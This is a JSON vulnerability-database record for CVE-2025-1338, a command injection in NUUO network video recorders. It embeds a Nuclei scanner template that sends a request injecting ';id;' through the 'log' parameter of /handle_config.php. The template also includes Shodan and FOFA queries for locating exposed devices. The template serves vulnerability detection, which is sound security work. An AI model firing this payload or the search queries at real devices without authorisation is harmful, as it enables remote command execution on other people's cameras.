{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-1338/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-1338/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-1338/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-1338/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-1338/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-1338"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-1338"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2025/CVE-2025-1338.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2025-1338\n\ninfo:\n  name: NUUO Camera <=20250203 - OS Command Injection\n  author: Ark\n  severity: critical\n  description: |\n    NUUO Camera up to 20250203 contains a command injection caused by manipulation of the 'log' argument in /handle_config.php, letting remote attackers execute arbitrary commands, exploit requires remote access.\n  impact: |\n    Remote attackers can execute arbitrary commands on the system, potentially leading to full system compromise.\n  remediation: |\n    Update to the latest version of NUUO Camera or apply security patches provided by the vendor.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-1338\n    - https://github.com/advisories/GHSA-vw58-vgp6-39qx\n    - https://dbugs.ptsecurity.com/vulnerability/CVE-2025-1338\n  classification:\n    cve-id: CVE-2025-1338\n    epss-score: 0.51116\n    epss-percentile: 0.98882\n    cwe-id: CWE-78\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.title:\"Network Video Recorder Login\"\n    fofa-query: title=\"Network Video Recorder Login\" || body=\"www.nuuo.com\"\n  tags: cve,cve2025,nuuo,camera,rce,cmdi,intrusive,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /handle_config.php?log=;id; HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"/mtd/block4/log/\", \"uid=\", \"gid=\")'\n        condition: and\n# digest: 4a0a0047304502206fb56c04e338927c9037979c6c1d0b6c970d6411f905e818a319b9ed65c34e5d022100b6207e292d89b7791cfe90a7cab623f98167bbce34a8b4c634dfbdb035a3104e:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2025-1338"
}